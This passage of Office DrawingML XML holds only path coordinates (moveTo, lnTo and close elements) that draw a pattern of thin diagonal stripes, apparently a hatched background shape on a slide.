                  <a:pt x="2" y="14562548"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="14195499"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12751483" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12631456" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14315527"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="13948476"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12998507" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12878479" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14068504"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="13701450"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13245530" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13125503" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13821481"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="13454429"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13492554" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13372527" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="13574454"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="13207406"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13739577" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13619550" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13327433"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="12960382"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13986601" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13866574" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13080409"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="12713358"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14233624" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14113597" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="12833386"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="12466338"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14480648" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14360621" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="12586359"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="12219312"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14727671" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14607644" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="12339339"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="11972285"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14974695" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14854668" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="12092315"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="11725265"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15221718" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15101691" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="11845292"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="11478241"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15468742" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15348715" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="11598268"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="11231218"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15715765" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15595738" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="11351245"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="10984191"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15962789" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15842762" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="11104221"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="10737170"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16209812" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16089785" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10857198"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="10490147"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16456836" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16336809" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10610174"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="10243123"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16703862" y="26946982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16583838" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10363151"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="9996100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16950889" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16830861" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10116127"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="9749076"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17197906" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17077879" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9869104"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="9502053"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17444930" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17324903" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9622080"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="9255029"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17691953" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17571926" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9375057"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="9008006"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17938977" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17818950" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9128033"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="8760982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18186000" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18065973" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8881007"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="8513959"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18433024" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18312997" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="8633986"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="8266935"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18680047" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18560020" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="8386962"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="8019911"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18927074" y="26946976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18807046" y="26946976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="8139941"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="7772886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19174099" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19054070" y="26946982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7892915"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="7525863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19421123" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19301096" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7645891"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="7278839"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19668144" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19548114" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7398868"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="7031816"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19915168" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19795138" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7151845"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="6784792"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20162191" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20042161" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="6904821"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="6537769"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20409215" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20289185" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="6657797"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="6290745"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20656238" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20536210" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="6410774"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="6043722"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20903262" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20783233" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="6163751"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="5796695"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21150288" y="26946976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21030257" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5916727"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="5549674"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21397309" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21277283" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5669703"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="5302651"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21644338" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21524306" y="26946982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5422680"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="5055625"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21891359" y="26946982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21771333" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5175656"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="4808604"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22138379" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22018356" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="4928633"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="4561580"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22385403" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22265374" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="4681609"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="4314557"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22632426" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22512398" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4434588"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="4067533"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22879450" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22759421" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4187559"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="3820510"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23126473" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23006445" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="3940541"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="3573492"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23373491" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23253463" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3693521"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="3326468"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23620515" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23500486" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="3446502"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="3079445"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23867538" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23747515" y="26946980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3199468"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="2832427"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952872" y="26785295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="26905324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2952458"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="2585397"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="26538263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="26658294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2705426"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="2338374"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952872" y="26291236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="26411265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2458403"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="2091350"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="26044215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="26164253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2211385"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="1844332"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="25797198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="25917226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1964361"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="1597300"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="25550168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="25670197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1717336"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="1350280"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="25303145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="25423176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1470306"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="1103265"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="25056133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="25176150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1223285"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="856241"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952872" y="24809106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="24929126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="976261"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="609215"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="24562080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="24682097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="729232"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="362185"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952872" y="24315048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952872" y="24435087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="482219"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="115162"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="24068027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="24188066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="235202"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20634699" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="3318175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="3438193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20514677" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="23725953" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23845980" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="106891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="226919"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="23478929" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23598962" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="353909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="473942"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="23231917" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23351944" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="600927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="720955"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="22984876" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23104912" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="847959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="967992"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="22857891" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="1094980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="1215010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22737861" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="22490835" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22610871" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="1342001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="1462033"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="22243833" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22363867" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="1589001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="1709037"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="22116832" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="1836039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="1956050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21996824" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21749786" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21869803" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="2083068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="2203084"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21622790" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="2330081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="2450116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21502754" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21255733" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21375778" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="2577090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="2697134"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21128748" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="2824121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="2944158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21008713" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20881709" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="3071162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="3191170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20761700" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20267634" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20387686" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="3565184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="3685234"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19773592" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19893631" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="4059240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="4179278"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19526569" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19646593" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="4306277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="4426302"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19032539" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19152560" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="4800307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952865" y="4920329"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18785510" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18905523" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="5047348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="5167360"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18411484" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952866" y="5541383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="5661411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18291460" y="6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18164455" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="5788415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="5908436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18044436" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16929343" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="7023527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="7143564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16809307" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20140638" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="3812233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="3932246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20020621" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19399573" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952866" y="4553295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="4673314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19279557" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18658491" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952869" y="5294380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="5414401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18538469" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17797415" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17917440" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="6035433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="6155457"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17550385" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17670422" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="6282451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="6402486"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17303356" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17423401" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="6529469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="6649515"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17056339" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17176373" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952866" y="6776495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="6896530"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
